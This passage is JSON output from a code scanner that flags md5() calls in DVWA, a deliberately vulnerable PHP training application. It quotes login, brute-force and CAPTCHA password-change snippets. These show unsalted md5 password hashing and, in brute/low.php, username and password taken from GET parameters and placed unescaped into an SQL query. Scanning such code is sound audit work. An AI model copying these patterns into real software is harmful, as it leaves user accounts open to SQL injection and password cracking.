punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">16:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">17:</span> \n<span class=\"line-number\">18:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token keyword\">Default</span> values\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$total_failed_login</span> <span class=\"token operator\">=</span> <span class=\"token number\">3</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t<span class=\"token variable\">$lockout_time</span> <span class=\"token operator\">=</span> <span class=\"token number\">15</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t<span class=\"token variable\">$account_locked</span> <span class=\"token operator\">=</span> <span class=\"token boolean\">false</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 16,
"start": 11,
"end": 22,
"severity": "unknown",
"note": ""
},
{
"id": 81,
"file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/low.php",
"filetype": "php",
"search": "\\smd5\\s*\\(",
"match": "<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get username\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get password\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check the database\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$query</span> <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> <span class=\"token operator\">*</span> FROM `users` WHERE user <span class=\"token operator\">=</span> <span class=\"token string\">'$user'</span> <span class=\"token operator\">AND</span> password <span class=\"token operator\">=</span> <span class=\"token string\">'$pass'</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> ",
"line": 9,
"start": 4,
"end": 15,
"severity": "unknown",
"note": ""
},
{
"id": 86,
"file": "/home/chris/src/DVWA-master/vulnerabilities/brute/source/medium.php",
"filetype": "php",
"search": "\\smd5\\s*\\(",
"match": "<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Sanitise password input\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">11:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">12:</span> \n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check the database\n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$query</span> <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> <span class=\"token operator\">*</span> FROM `users` WHERE user <span class=\"token operator\">=</span> <span class=\"token string\">'$user'</span> <span class=\"token operator\">AND</span> password <span class=\"token operator\">=</span> <span class=\"token string\">'$pass'</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$query</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> ",
"line": 11,
"start": 6,
"end": 17,
"severity": "unknown",
"note": ""
},
{
"id": 100,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/high.php",
"filetype": "php",
"search": "\\smd5\\s*\\(",
"match": "<span class=\"line-number\">23:</span> \t}\n<span class=\"line-number\">24:</span> \t<span class=\"token keyword\">else</span> {\n<span class=\"line-number\">25:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> CAPTCHA was correct<span class=\"token punctuation\">.</span> <span class=\"token keyword\">Do</span> both new passwords match<span class=\"token operator\">?</span>\n<span class=\"line-number\">26:</span> \t\t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token operator\">==</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">27:</span> \t\t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">28:</span> \t\t\t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">29:</span> \n<span class=\"line-number\">30:</span> \t\t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Update database\n<span class=\"line-number\">31:</span> \t\t\t<span class=\"token variable\">$insert</span> <span class=\"token operator\">=</span> <span class=\"token string\">\"UPDATE `users` SET password = '$pass_new' WHERE user = '\"</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaCurrentUser</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> \"' LIMIT <span class=\"token number\">1</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">32:</span> \t\t\t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$insert</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">or</span> <span class=\"token function\">die</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'<pre>'</span> <span class=\"token punctuation\">.</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_error</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$___mysqli_res</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_connect_error</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token variable\">$___mysqli_res</span> <span class=\"token punctuation\">:</span> <span class=\"token boolean\">false</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'</pre>'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">33:</span> ",
"line": 28,
"start": 23,
"end": 34,
"severity": "unknown",
"note": ""
},
{
"id": 111,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/impossible.php",
"filetype": "php",
"search": "\\smd5\\s*\\(",
"match": "<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">11:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_new'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">14:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 14,
"start": 9,
"end": 20,
"severity": "unknown",
"note": ""
},
{
"id": 112,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/source/impossible.php",
"filetype": "php",
"search": "\\smd5\\s*\\(",
"match": "<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$pass_new</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_new</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_conf'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">19:</span> \t<span class=\"token variable\">$pass_conf</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_conf</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">20:</span> \n<span class=\"line-number\">21:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password_current'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">23:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">24:</span> \t<span class=\"token variable\">$pass_curr</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass_curr</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 19,
"start": 14,
"end": 25,
"severity": "unknown",
